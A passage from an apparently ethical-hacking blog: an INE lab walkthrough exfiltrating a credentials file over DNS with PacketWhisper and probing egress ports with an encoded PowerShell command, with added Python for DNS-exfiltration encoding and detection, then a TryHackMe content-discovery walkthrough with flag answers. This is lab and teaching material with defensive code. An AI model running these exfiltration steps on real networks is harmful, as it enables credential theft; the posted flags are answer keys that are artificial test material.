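        if len(parts) != 3:
            continue
        seq, total = int(parts[0]), int(parts[1])
        chunks[seq] = _unb32(parts[2])
    if total is None:
        raise ValueError("no exfiltration queries in the capture")
    missing = [i for i in range(total) if i not in chunks]
    if missing:
        raise ValueError(f"missing chunks: {missing}")
    return zlib.decompress(b"".join(chunks[i] for i in range(total)))


def demo():
    """Round-trip a constructed credentials file through a simulated capture."""
    secret = b"Username: AdminELS\r\nPassword: <redacted>\r\n"  # constructed, not the lab file
    names = encode_file(secret, "exfil.example")
    # What Wireshark on tap0 would show: reordered, with retries and normal noise.
    observed = list(reversed(names)) + names[:2] + ["time.windows.com", "www.msftncsi.com"]
    recovered = decode_queries(observed, "exfil.example")
    return names, recovered == secret


if __name__ == "__main__":
    names, ok = demo()
    print(f"{len(names)} queries, longest name {max(map(len, names))} chars, recovered={ok}")
    for n in names[:3]:
        print(" ", n)
```

Real tooling encrypts or obfuscates the payload before encoding; this block only shows the transport. base32 keeps the labels within the DNS character set, the sequence numbers make reassembly independent of arrival order, and the length checks keep every label under 63 characters and every name under 253. A burst of long, high-entropy subdomains under one domain is also exactly what a DNS-exfiltration detection rule looks for.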

    To begin, download PacketWhisper from GitHub. On Kali Linux, the convenient way is git clone: on your Kali machine, open a new terminal and run git clone with the repository URL (https://github.com/TryCatchHCF/PacketWhisper) inside a directory of your choice.

    The /tmp path is the one we chose for our machine; you can execute the commands inside any directory you want.

    For easier transfer, also download PacketWhisper as a zipped file as follows:

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp]
    └─$ sudo wget https://github.com/TryCatchHCF/PacketWhisper/archive/master.zip
    [sudo] password for hackerboy: 
    --2021-12-11 14:12:17--  https://github.com/TryCatchHCF/PacketWhisper/archive/master.zip
    Resolving github.com (github.com)... 13.234.210.38
    Connecting to github.com (github.com)|13.234.210.38|:443... connected.
    HTTP request sent, awaiting response... 302 Found
    Location: https://codeload.github.com/TryCatchHCF/PacketWhisper/zip/master [following]
    --2021-12-11 14:12:24--  https://codeload.github.com/TryCatchHCF/PacketWhisper/zip/master
    Resolving codeload.github.com (codeload.github.com)... 13.233.43.20
    Connecting to codeload.github.com (codeload.github.com)|13.233.43.20|:443... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [application/zip]
    Saving to: ‘master.zip’
    
    master.zip                              [                       <=>                                          ]  28.60M   972KB/s    in 37s      
    
    2021-12-11 14:13:03 (795 KB/s) - ‘master.zip’ saved [29988645]
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp]
    └─$ ls
    anydesk             ssh-nCKwBah2CZIz                                                                Temp-34b1d66c-22ba-4d1e-ac38-9cfc255a5e8e
    dbus-cCi149VHMi     systemd-private-05e85aceec3c4a1487cd1d5119244ef5-colord.service-mCOWOf          Temp-37c3f3f2-4307-4b30-a482-090d458e3fd5
    gimp                systemd-private-05e85aceec3c4a1487cd1d5119244ef5-haveged.service-IbYCHi         tracker-extract-3-files.1000
    master.zip          systemd-private-05e85aceec3c4a1487cd1d5119244ef5-ModemManager.service-4cczij    tracker-extract-3-files.131
    mozilla_hackerboy0  systemd-private-05e85aceec3c4a1487cd1d5119244ef5-systemd-logind.service-LZMqei  wireshark_tap0OL9LE1.pcapng
    pulse-PKdhtXMmr18n  systemd-private-05e85aceec3c4a1487cd1d5119244ef5-tor@default.service-GDI7cj
    runtime-root        systemd-private-05e85aceec3c4a1487cd1d5119244ef5-upower.service-NmDrlg
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp]
    └─$ 

    Finally, you can again point the browser on the 172.16.91.100 machine to your tap0 IP and port 8080 in order to download the tool.

    Remember that the file you want to download must be in the directory inside which you started the Python server.


    Now, you can download the compressed PacketWhisper to the desktop for easier access and unzip it by right-clicking on the archive.

    (To save you time, we have already downloaded PacketWhisper for you and placed it on the AdminELS user's desktop)


    Now it's time to use PacketWhisper. In order to run PacketWhisper:

    1) Launch Wireshark on your Kali Machine again and use the "tap0" interface to listen.
    2) Launch cmd.exe on the 172.16.91.100 machine and go to the PacketWhisper directory.
    3) Copy the credentials.txt file to the PacketWhisper's directory.
    4) Launch PacketWhisper.




    First, extract the zip file into the same directory, as described above the screenshot.

    Back on your Kali machine, in Wireshark you should be able to see DNS queries to subdomains of cloudfront.net within the traffic:

    Now, save the Wireshark capture file. Remember to use the .pcap format as per the below screenshot.

    Next, copy the saved pcap file into the PacketWhisper directory (in this case it's named file.pcap).

    Finally, open a new terminal and go to PacketWhisper's directory and execute the following.

    (Maybe you guys now understand why I used the disk:linux=/home/hackerboy/Documents/ine-lab option with rdesktop at the beginning!)

    Let's go ahead.

    python PacketWhisper.py
    
    2
    
    file.pcap
    
    1
    
    1
    
    3
    
    [enter]
    
    The file should now be successfully decrypted. To view its content, you can execute the below, or double-click the decloaked.file file.
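    From the defender's side, the transfer above leaves a distinctive trace in resolver logs: one client issuing many distinct, random-looking subdomains of a single parent domain in quick succession. The Python below is an added example (not part of the original post and not PacketWhisper's code) that scores constructed BIND-style query-log lines on exactly that pattern; the log format and the client IPs are assumptions.

```python
import math
import re
from collections import defaultdict

# Constructed BIND-style query log lines (not from the original post). The
# first six mimic what a DNS-exfiltration transfer looks like to a resolver;
# the remaining lines are ordinary lookups from the same and another client.
SAMPLE_QUERY_LOG = """\
11-Dec-2021 14:20:01.001 client 172.16.91.100#51512: query: d1f0a9c3b2e7.cloudfront.net IN A + (172.16.91.10)
11-Dec-2021 14:20:01.020 client 172.16.91.100#51513: query: d4b8c1e9a0f3.cloudfront.net IN A + (172.16.91.10)
11-Dec-2021 14:20:01.041 client 172.16.91.100#51514: query: d9e2f7a1c5b0.cloudfront.net IN A + (172.16.91.10)
11-Dec-2021 14:20:01.063 client 172.16.91.100#51515: query: d7a3e8b2f1c4.cloudfront.net IN A + (172.16.91.10)
11-Dec-2021 14:20:01.085 client 172.16.91.100#51516: query: d2c5f9e0a7b3.cloudfront.net IN A + (172.16.91.10)
11-Dec-2021 14:20:01.108 client 172.16.91.100#51517: query: d0b7a4c9e3f2.cloudfront.net IN A + (172.16.91.10)
11-Dec-2021 14:20:02.000 client 172.16.91.100#51518: query: www.github.com IN A + (172.16.91.10)
11-Dec-2021 14:20:02.500 client 172.16.91.101#40001: query: www.github.com IN A + (172.16.91.10)
11-Dec-2021 14:20:02.600 client 172.16.91.101#40002: query: codeload.github.com IN A + (172.16.91.10)
"""

QUERY_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)")


def shannon_entropy(text: str) -> float:
    """Bits per character: random hex/base32 labels score high, words score low."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname: str):
    """Return (subdomain, parent) using a naive 'last two labels' split.

    A real detector should use a public-suffix list so that e.g. foo.co.uk is
    not treated as a subdomain of co.uk.
    """
    labels = qname.rstrip(".").split(".")
    if len(labels) < 3:
        return "", qname.rstrip(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def find_dns_exfil_suspects(lines, min_unique=5, min_entropy=3.0):
    """Group queries by (client, parent domain) and flag groups that issued many
    distinct, high-entropy subdomains. Returns {(client, parent): stats}.

    Caveat: CDNs such as cloudfront.net legitimately use many hashed hostnames,
    which is exactly why such domains are chosen as cover, so thresholds must
    be baselined against normal traffic; rate per minute and the query-type mix
    (TXT/NULL) are further signals a production detector would add.
    """
    groups = defaultdict(lambda: {"unique": set(), "entropies": []})
    for line in lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        sub, parent = split_qname(m.group("qname"))
        if not sub:
            continue
        g = groups[(m.group("client"), parent)]
        if sub not in g["unique"]:
            g["unique"].add(sub)
            g["entropies"].append(shannon_entropy(sub.replace(".", "")))
    suspects = {}
    for key, g in groups.items():
        mean_h = sum(g["entropies"]) / len(g["entropies"])
        if len(g["unique"]) >= min_unique and mean_h >= min_entropy:
            suspects[key] = {"unique": len(g["unique"]), "mean_entropy": round(mean_h, 3)}
    return suspects


if __name__ == "__main__":
    for (client, parent), stats in find_dns_exfil_suspects(SAMPLE_QUERY_LOG.splitlines()).items():
        print(f"{client} -> *.{parent}: {stats['unique']} unique subdomains, "
              f"mean entropy {stats['mean_entropy']}")
```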

    Task 4: Automate enumerating all the exfiltration paths and identify another one


    During penetration tests, we need to automate a large portion of our commonly executed activities to save time.

    Let's use the egresscheck framework to see how it can automate identifying the ports that are allowed outbound connectivity.

    There might be another port which is allowed outbound connectivity that we missed.

    To download and launch the egresscheck framework, execute the below inside any directory you want on your Kali machine.

    # git clone https://github.com/stufus/egresscheck-framework.git
    
    # cd egresscheck-framework/
    
    # ./ecf.py
    



    ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp]
    └─$ sudo git clone https://github.com/stufus/egresscheck-framework.git       
    [sudo] password for hackerboy: 
    Cloning into 'egresscheck-framework'...
    remote: Enumerating objects: 393, done.
    remote: Total 393 (delta 0), reused 0 (delta 0), pack-reused 393
    Receiving objects: 100% (393/393), 88.69 KiB | 216.00 KiB/s, done.
    Resolving deltas: 100% (191/191), done.
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp]
    └─$ cd egresscheck-framework
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/egresscheck-framework]
    └─$ ls
    ecf.py  LICENSE  README.md
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/egresscheck-framework]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/egresscheck-framework]
    └─$ 
    You need to configure the tool by specifying:


    #The tap0 IP of your Kali machine (TARGETIP)
    #The 172.16.91.100 machine's IP (SOURCEIP)
    #A port range (PORTS)
    #The protocol (PROTOCOL)

    ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/egresscheck-framework]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/egresscheck-framework]
    └─$ ./ecf.py          
    
           .mMMMMMm.             MMm    M   WW   W   WW   RRRRR
          mMMMMMMMMMMM.           MM   MM    W   W   W    R   R
         /MMMM-    -MM.           MM   MM    W   W   W    R   R
        /MMM.    _  \/  ^         M M M M     W W W W     RRRR
        |M.    aRRr    /W|        M M M M     W W W W     R  R
        \/  .. ^^^   wWWW|        M  M  M      W   W      R   R
           /WW\.  .wWWWW/         M  M  M      W   W      R    R
           |WWWWWWWWWWW/
             .WWWWWW.        EgressChecker Mini-Framework v0.1-pre2
                         stuart.morgan@mwrinfosecurity.com | @ukstufus
    
    
    egresschecker> set PORTS 8500-9500
    PORTS => 8500-9500 (1001 ports)
    
    egresschecker>  set TARGETIP 172.16.91.10
    TARGETIP => 172.16.91.10
    
    egresschecker> set SOURCEIP 172.16.91.100
    SOURCEIP => 172.16.91.100
    
    egresschecker> set PROTOCOL tcp
    PROTOCOL => TCP
    
    egresschecker> generate powershell-cmd
    
    Warning: The powershell code does not support multiple threads; it will generate packets asynchronously but on a single thread only.
    
    Run the command below on the client machine:
    powershell.exe -e JABpAHAAIAA9ACAAIgAxADcAMgAuADEANgAuADkAMQAuADEAMAAiAAoAJABwAHIAIAA9ACAAIgA4ADUAMAAwAC0AOQA1ADAAMAAiACAALQBzAHAAbABpAHQAIAAnACwAJwAKAGYAbwByAGUAYQBjAGgAIAAoACQAcAAgAGkAbgAgACQAcAByACkAIAB7AAoAIABpAGYAIAAoACQAcAAgAC0AbQBhAHQAYwBoACAAJwBeAFsAMAAtADkAXQArAC0AWwAwAC0AOQBdACsAJAAnACkAIAB7AAoAIAAgACQAcAByAGEAbgBnAGUAIAA9ACAAJABwACAALQBzAHAAbABpAHQAIAAnAC0AJwAKACAAIAAkAGgAaQBnAGgAIAA9ACAAJABwAHIAYQBuAGcAZQBbADEAXQAKACAAIAAkAGwAbwB3ACAAPQAgACQAcAByAGEAbgBnAGUAWwAwAF0ACgAgAH0AIABlAGwAcwBlAGkAZgAgACgAJABwACAALQBtAGEAdABjAGgAIAAnAF4AWwAwAC0AOQBdACsAJAAnACkAIAB7AAoAIAAgACQAaABpAGcAaAAgAD0AIAAkAHAACgAgACAAJABsAG8AdwAgAD0AIAAkAHAACgAgAH0AIABlAGwAcwBlACAAewAKACAAIAByAGUAdAB1AHIAbgAKACAAfQAKACAAZgBvAHIAIAAoACQAYwAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAbABvAHcAKQA7ACQAYwAgAC0AbABlACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBJAG4AdAAzADIAKAAkAGgAaQBnAGgAKQA7ACQAYwArACsAKQAgAHsACgAgACAAdAByAHkAIAB7AAoAIAAgACAAJAB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0AAoAIAAgACAAJAB0AC4AQgBlAGcAaQBuAEMAbwBuAG4AZQBjAHQAKAAkAGkAcAAsACAAJABjACwAIAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKACAAIAAgACQAdAAuAEMAbABvAHMAZQAoACkACgAgACAAfQAKACAAIABjAGEAdABjAGgAIAB7ACAAfQAKACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAG0AIAAoADAALgAxACoAMQAwADAAMAApAAoAIAB9AAoAfQA=
    
    Also written to: /tmp/egress_2021dec11_164823_HoaERD.bat
    
    egresschecker> 
    

    Copy this file into the same directory from which you ran the rdesktop program.


    The generate powershell-cmd command we see above was executed in order to get a single PowerShell command that helps us automate the firewall assessment.


    This Base64-encoded command (passed with powershell.exe -e) contains code that makes PowerShell try to connect to every port in the given range on your Kali machine from the 172.16.91.100 machine.

    Before initiating this procedure on the 172.16.91.100 machine, the following requirements should be fulfilled:


    #Transfer this command to the 172.16.91.100 machine
    #Run Wireshark on your Kali Machine
    #Execute the command on the 172.16.91.100 machine



    You can transfer the command using the Python server, and port 8080 like you did previously.

    To do so, first go to the directory where the egresscheck framework generated a BAT file (see the "Also written to:" line in the output above).

    Egresscheck informs you of this BAT file with a message, which will be similar to the one below:

    "Also written to: /tmp/egress_2019jan16_125152_VNcIt8.bat"

    To serve this file using the Python server, execute the following:


    # cd /tmp
    # python -m SimpleHTTPServer 8080

    Download the .bat file generated by the egress framework.

    Next, go back to your Kali machine, execute Wireshark again and point it to listen on the tap0 interface.

    Finally, right-click the downloaded BAT file on the 172.16.91.100 machine and click "Run as administrator."


    A similar window to the one below will pop up. In the meantime, go to Wireshark on your Kali machine and observe the traffic.

    After a short period of time, Wireshark will receive a packet destined to port 9000 - which means that this port is also allowed outbound connectivity on the 172.16.91.100 machine's firewall; this is the third and last port which is allowed outbound connectivity.
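    Both Wireshark observations above (the manual port checks and the egresscheck sweep) come down to the same rule: a port is allowed outbound if its first packet reaches the listener, and blocked if nothing arrives. The Python below is an added example (not from the original lab or from egresscheck) that applies that rule to constructed tshark summary lines in the format the packet list shows; the lab's IPs are reused, the packets themselves are made up.

```python
import re

# Constructed tshark one-line summaries (not a capture from the original post):
# frame, time, src -> dst, protocol, length, info. 172.16.91.100 is the Windows
# host under test and 172.16.91.10 the Kali listener.
SAMPLE_TSHARK = """\
    1 0.000000000 172.16.91.100 → 172.16.91.10 TCP 66 49712 → 8080 [SYN] Seq=0 Win=64240 Len=0 MSS=1460
    2 0.000213000 172.16.91.10 → 172.16.91.100 TCP 66 8080 → 49712 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0
    3 0.000450000 172.16.91.100 → 172.16.91.10 TCP 54 49712 → 8080 [ACK] Seq=1 Ack=1 Win=131328 Len=0
    4 0.310000000 172.16.91.100 → 172.16.91.10 DNS 85 Standard query 0x1a2b A d1f0a9c3b2e7.cloudfront.net
    5 12.500000000 172.16.91.100 → 172.16.91.10 TCP 66 49801 → 9000 [SYN] Seq=0 Win=64240 Len=0
    6 12.500300000 172.16.91.10 → 172.16.91.100 TCP 54 9000 → 49801 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
    7 13.500000000 172.16.91.100 → 172.16.91.10 TCP 66 49801 → 9000 [SYN] Seq=0 Win=64240 Len=0
    8 14.000000000 172.16.91.100 → 172.16.91.10 ICMP 74 Echo (ping) request id=0x0001, seq=1/256, ttl=128
    9 15.000000000 172.16.91.102 → 172.16.91.10 TCP 66 50000 → 443 [SYN] Seq=0 Win=64240 Len=0
"""

# tshark prints the arrow as "→" or "->" depending on locale; accept both.
SUMMARY_RE = re.compile(
    r"^\s*\d+\s+[\d.]+\s+(?P<src>\S+)\s+(?:→|->)\s+(?P<dst>\S+)\s+(?P<proto>\S+)\s+\d+\s+(?P<info>.*)$"
)
TCP_INFO_RE = re.compile(r"^(?P<sport>\d+)\s+(?:→|->)\s+(?P<dport>\d+)\s+\[(?P<flags>[^\]]*)\]")


def egress_allowed_ports(lines, source_ip, listener_ip):
    """Return {"tcp": set(), "udp": set()} of destination ports on listener_ip
    that source_ip actually reached, judged from the listener's own capture.

    Only the first packet of an outbound attempt counts: a bare SYN for TCP, a
    query for DNS. Replies from the listener, retransmits, other hosts and ICMP
    are ignored. Anything the firewall dropped never shows up at all, which is
    the "allowed = seen, blocked = silent" logic of the lab.
    Assumption: the summary line hides the UDP port for DNS, so DNS rows are
    attributed to udp/53; export with -T fields -e udp.dstport to be exact.
    """
    allowed = {"tcp": set(), "udp": set()}
    for line in lines:
        m = SUMMARY_RE.match(line)
        if not m or m.group("src") != source_ip or m.group("dst") != listener_ip:
            continue
        proto, info = m.group("proto"), m.group("info")
        if proto == "TCP":
            t = TCP_INFO_RE.match(info)
            if not t:
                continue
            flags = {f.strip() for f in t.group("flags").split(",")}
            if "SYN" in flags and "ACK" not in flags:
                allowed["tcp"].add(int(t.group("dport")))
        elif proto == "DNS" and "Standard query" in info and "response" not in info:
            allowed["udp"].add(53)
    return allowed


if __name__ == "__main__":
    found = egress_allowed_ports(SAMPLE_TSHARK.splitlines(), "172.16.91.100", "172.16.91.10")
    for proto, ports in found.items():
        print(f"{proto}: {sorted(ports)}")
```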

    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or incite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal

     

  • TryHackMe Content Discovery Walkthrough

     

    TryHackMe Content Discovery Walkthrough


    What Is Content Discovery?


    Firstly, we should ask, in the context of web application security, what is content? Content can be many things, a file, video, picture, backup, a website feature. When we talk about content discovery, we're not talking about the obvious things we can see on a website; it's the things that aren't immediately presented to us and that weren't always intended for public access.

    This content could be, for example, pages or portals intended for staff usage, older versions of the website, backup files, configuration files, administration panels, etc.

    There are three main ways of discovering content on a website which we'll cover. Manually, Automated and OSINT (Open-Source Intelligence).

    Start the machine and then move on to the next task.

    1) What is the Content Discovery method that begins with M?

    Ans- Manually



    2) What is the Content Discovery method that begins with A?

    Ans- Automated



    3) What is the Content Discovery method that begins with O?

    Ans- OSINT

    Manual Discovery - Robots.txt


    There are multiple places we can manually check on a website to start discovering more content.



    Robots.txt

    The robots.txt file is a document that tells search engines which pages they are and aren't allowed to show on their search engine results or ban specific search engines from crawling the website altogether. It can be common practice to restrict certain website areas so they aren't displayed in search engine results. These pages may be areas such as administration portals or files meant for the website's customers. This file gives us a great list of locations on the website that the owners don't want us to discover as penetration testers.


    Take a look at the robots.txt file on the Acme IT Support website to see if they have anything they don't want to list: http://MACHINE_IP/robots.txt



    1) What is the directory in the robots.txt that isn't allowed to be viewed by web crawlers?


    Ans- /staff-portal

     

     


    Manual Discovery - Favicon


    Favicon

    The favicon is a small icon displayed in the browser's address bar or tab used for branding a website.



    Sometimes when frameworks are used to build a website, a favicon that is part of the installation gets left over, and if the website developer doesn't replace it with a custom one, this can give us a clue about which framework is in use. OWASP hosts a database of common framework icons that you can check the target's favicon against: https://wiki.owasp.org/index.php/OWASP_favicon_database. Once we know the framework stack, we can use external resources to discover more about it (see next section).



    Practical Exercise:


    Open the website https://static-labs.tryhackme.cloud/sites/favicon/. You'll see a basic website with a note saying "Website coming soon...", and if you look at your tabs you'll notice an icon, which confirms this site is using a favicon.


    Viewing the page source you'll see line six contains a link to the images/favicon.ico file. 



    If you run the following command, it will download the favicon and compute its MD5 hash, which you can then look up in the OWASP favicon database: https://wiki.owasp.org/index.php/OWASP_favicon_database.

    1) What framework did the favicon belong to?

    HINT- Visit this link https://wiki.owasp.org/index.php/OWASP_favicon_database

    Ans- cgiirc

     

     

    Manual Discovery - Sitemap.xml


    Sitemap.xml

    Unlike the robots.txt file, which restricts what search engine crawlers can look at, the sitemap.xml file gives a list of every file the website owner wishes to be listed on a search engine. These can sometimes contain areas of the website that are a bit more difficult to navigate to or even list some old webpages that the current site no longer uses but are still working behind the scenes.


    Take a look at the sitemap.xml file on the Acme IT Support website to see if there's any new content we haven't yet discovered: http://10.10.159.199/sitemap.xml



    1) What is the path of the secret area that can be found in the sitemap.xml file?


    Ans- /s3cr3t-area


     

     

    Manual Discovery - HTTP Headers


    HTTP Headers

    When we make requests to the web server, the server returns various HTTP headers. These headers can sometimes contain useful information such as the webserver software and possibly the programming/scripting language in use. In the below example, we can see the webserver is NGINX version 1.18.0 and runs PHP version 7.4.3. Using this information, we could find vulnerable versions of software being used. Try running the below curl command against the web server, where the -v switch enables verbose mode, which will output the headers (there might be something interesting!).

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ curl http://10.10.159.199 -v
    *   Trying 10.10.159.199:80...
    * Connected to 10.10.159.199 (10.10.159.199) port 80 (#0)
    >  GET / HTTP/1.1
    >  Host: 10.10.159.199
    >  User-Agent: curl/7.74.0
    >  Accept: */*
    > * Mark bundle as not supporting multiuse
    < HTTP/1.1 200 OK
    < Server: nginx/1.18.0 (Ubuntu)
    < Date: Thu, 02 Dec 2021 16:44:21 GMT
    < Content-Type: text/html; charset=UTF-8
    < Transfer-Encoding: chunked
    < Connection: keep-alive
    < X-FLAG: THM{HEADER_FLAG}
    < 
    <!--
    This page is temporary while we work on the new homepage @ /new-home-beta
    -->

    1) What is the flag value from the X-FLAG header?

      
    Ans- THM{HEADER_FLAG}
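    The robots.txt, sitemap.xml and HTTP header checks above can be scripted. The Python below is an added example (not from the TryHackMe room) that runs on constructed copies of those three artefacts modelled on what the walkthrough finds, and also pulls paths out of HTML comments such as the /new-home-beta hint in the curl output; the file contents are assumptions, not the lab's actual files.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed samples modelled on the walkthrough's findings (not the real files).
ROBOTS_TXT = """\
User-agent: *
Allow: /
Disallow: /staff-portal
Sitemap: http://10.10.159.199/sitemap.xml
"""

SITEMAP_XML = """\
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url><loc>http://10.10.159.199/</loc></url>
  <url><loc>http://10.10.159.199/news</loc></url>
  <url><loc>http://10.10.159.199/s3cr3t-area</loc></url>
</urlset>
"""

RAW_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/1.18.0 (Ubuntu)\r\n"
    "X-Powered-By: PHP/7.4.3\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "X-FLAG: THM{HEADER_FLAG}\r\n"
    "\r\n"
    "<!-- This page is temporary while we work on the new homepage @ /new-home-beta -->\n"
)


def robots_paths(text):
    """Disallow entries name the areas the owner does not want indexed.
    Returns (disallowed paths, sitemap URLs), deduplicated, comments stripped."""
    disallowed, sitemaps = [], []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        if key.lower() == "disallow" and value and value not in disallowed:
            disallowed.append(value)
        elif key.lower() == "sitemap" and value not in sitemaps:
            sitemaps.append(value)
    return disallowed, sitemaps


def sitemap_paths(xml_text):
    """Every <loc> in a sitemap is a URL the owner wants indexed; return the paths."""
    root = ET.fromstring(xml_text)
    ns = {"sm": "http://www.sitemaps.org/schemas/sitemap/0.9"}
    return [urlparse(loc.text.strip()).path for loc in root.findall(".//sm:loc", ns)]


VERSION_RE = re.compile(r"([A-Za-z][\w-]*)/(\d+(?:\.\d+)+)")


def fingerprint_headers(raw_response):
    """Pull software/version pairs and non-standard X- headers out of a raw
    HTTP response like the one curl -v prints (status line excluded)."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    versions, custom = [], {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip(), value.strip()
        versions.extend(VERSION_RE.findall(value))
        if name.lower().startswith("x-") and name.lower() != "x-powered-by":
            custom[name] = value
    return {"versions": versions, "custom_headers": custom}


def html_comment_paths(body):
    """Paths mentioned inside HTML comments, the kind of clue the framework-stack
    section tells you to look for in the page source."""
    comments = re.findall(r"<!--(.*?)-->", body, re.S)
    return sorted({p for c in comments for p in re.findall(r"(?<![\w:/.])/[\w./-]+", c)})


if __name__ == "__main__":
    print(robots_paths(ROBOTS_TXT))
    print(sitemap_paths(SITEMAP_XML))
    print(fingerprint_headers(RAW_RESPONSE))
    print(html_comment_paths(RAW_RESPONSE.split("\r\n\r\n", 1)[1]))
```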

     

     



    Manual Discovery - Framework Stack

    Framework Stack

    Once you've established the framework of a website, either from the above favicon example or by looking for clues in the page source such as comments, copyright notices or credits, you can then locate the framework's website. From there, we can learn more about the software and other information, possibly leading to more content we can discover.


    Looking at the page source of our Acme IT Support website (http://10.10.159.199), you'll see a comment at the end of every page with a page load time and also a link to the framework's website, which is https://static-labs.tryhackme.cloud/sites/thm-web-framework. Let's take a look at that website. Viewing the documentation page gives us the path of the framework's administration portal, which gives us a flag if viewed on the Acme IT Support website.



    1) What is the flag from the framework's administration portal?


    Ans- THM{CHANGE_DEFAULT_CREDENTIALS}

     

     

    OSINT - Google Hacking / Dorking


    There are also external resources available that can help in discovering information about your target website; these resources are often referred to as OSINT or (Open-Source Intelligence) as they're freely available tools that collect information:



    Google Hacking / Dorking


    Google hacking / dorking utilizes Google's advanced search engine features, which allow you to pick out custom content. You can, for instance, pick out results from a certain domain name using the site: filter, for example site:hackingtruth.in. You can then combine this with certain search terms, say the word admin (site:hackingtruth.in admin); this would only return results from the hackingtruth.in website that contain the word admin in their content. You can combine multiple filters as well. Here are some more filters you can use:

     

     

    Filter     Example              Description
    site       site:tryhackme.com   returns results only from the specified website address
    inurl      inurl:admin          returns results that have the specified word in the URL
    filetype   filetype:pdf         returns results which are a particular file extension
    intitle    intitle:admin        returns results that contain the specified word in the title

     



    More information about google hacking can be found here: https://en.wikipedia.org/wiki/Google_hacking



    1) What Google dork operator can be used to only show results from a particular site?

    Ans- site:



    OSINT - Wappalyzer


    Wappalyzer

    Wappalyzer (https://www.wappalyzer.com/) is an online tool and browser extension that helps identify what technologies a website uses, such as frameworks, Content Management Systems (CMS), payment processors and much more, and it can even find version numbers as well.



    1) What online tool can be used to identify what technologies a website is running?

    Ans- Wappalyzer




    OSINT - Wayback Machine


    Wayback Machine

    The Wayback Machine (https://archive.org/web/) is a historical archive of websites that dates back to the late 90s. You can search a domain name, and it will show you all the times the service scraped the web page and saved the contents. This service can help uncover old pages that may still be active on the current website.



    1) What is the website address for the Wayback Machine?

    Ans- https://archive.org/web/



    OSINT - GitHub


    GitHub

    To understand GitHub, you first need to understand Git. Git is a version control system that tracks changes to files in a project. Working in a team is easier because you can see what each team member is editing and what changes they made to files. When users have finished making their changes, they commit them with a message and then push them back to a central location (repository) for the other users to then pull those changes to their local machines. GitHub is a hosted version of Git on the internet. Repositories can either be set to public or private and have various access controls. You can use GitHub's search feature to look for company names or website names to try and locate repositories belonging to your target. Once discovered, you may have access to source code, passwords or other content that you hadn't yet found.



    1) What is Git?

    Ans- Version Control System



    OSINT - S3 Buckets


    S3 Buckets

    S3 Buckets are a storage service provided by Amazon AWS, allowing people to save files and even static website content in the cloud accessible over HTTP and HTTPS. The owner of the files can set access permissions to either make files public, private and even writable. Sometimes these access permissions are incorrectly set and inadvertently allow access to files that shouldn't be available to the public. The format of the S3 buckets is http(s)://{name}.s3.amazonaws.com where {name} is decided by the owner, such as tryhackme-assets.s3.amazonaws.com. S3 buckets can be discovered in many ways, such as finding the URLs in the website's page source, GitHub repositories, or even automating the process. One common automation method is by using the company name followed by common terms such as {name}-assets, {name}-www, {name}-public, {name}-private, etc.



    1) What URL format do Amazon S3 buckets end in?

    Ans- .s3.amazonaws.com




    Automated Discovery


    What is Automated Discovery?


    Automated discovery is the process of using tools to discover content rather than doing it manually. This process is automated as it usually contains hundreds, thousands or even millions of requests to a web server. These requests check whether a file or directory exists on a website, giving us access to resources we didn't previously know existed. This process is made possible by using a resource called wordlists.





    What are wordlists?


    Wordlists are just text files that contain a long list of commonly used words; they can cover many different use cases. For example, a password wordlist would include the most frequently used passwords, whereas we're looking for content in our case, so we'd require a list containing the most commonly used directory and file names. An excellent resource for wordlists that is preinstalled on the THM AttackBox is https://github.com/danielmiessler/SecLists which Daniel Miessler curates.




    Automation Tools


    Although there are many different content discovery tools available, all with their features and flaws, we're going to cover three which are preinstalled on our attack box, ffuf, dirb and gobuster.


    Open the THM AttackBox using the blue Start AttackBox button and then try the below three commands on our Acme IT Support website and see what results you get.

     

    Using ffuf:
    
